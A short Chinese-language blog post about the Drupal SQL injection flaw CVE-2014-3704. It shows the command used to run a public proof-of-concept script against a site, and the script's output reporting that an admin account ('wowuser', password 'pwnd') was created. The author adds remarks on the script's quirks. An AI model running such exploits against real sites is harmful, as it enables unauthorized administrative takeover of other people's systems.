最近 drupal 有新的漏洞 (CVE-2014-3704) 出現,現在也已有可執行的程式
實際執行 python xxxx.py http://ssorc.tw/ wowuser
這樣子就可以有 ADMIN 權限的帳號了
============================================================================= | DRUPAL SQL INJECTIION DEMO (CVE-2014-3704) | | Author: Mike Czumak (T_v3rn1x) - @SecuritySift | ============================================================================= [*] SUCCESS: Admin user 'wowuser' should now be added with password 'pwnd' and uid of 99999 Navigate to http://ssorc.tw/?destination=node and login with these credentials
要確定目的端是 drupal,它不管打誰都是 SUCCESS :|
還有它的 id 會是 99999,那我再執行一次,但換別的 user,就不會有新的 user 被建立,是因為同一個 id 嗎,所以意思是這個程式只能 hack 一次 :D
參考 http://www.securitysift.com/drupal-7-sqli/
留言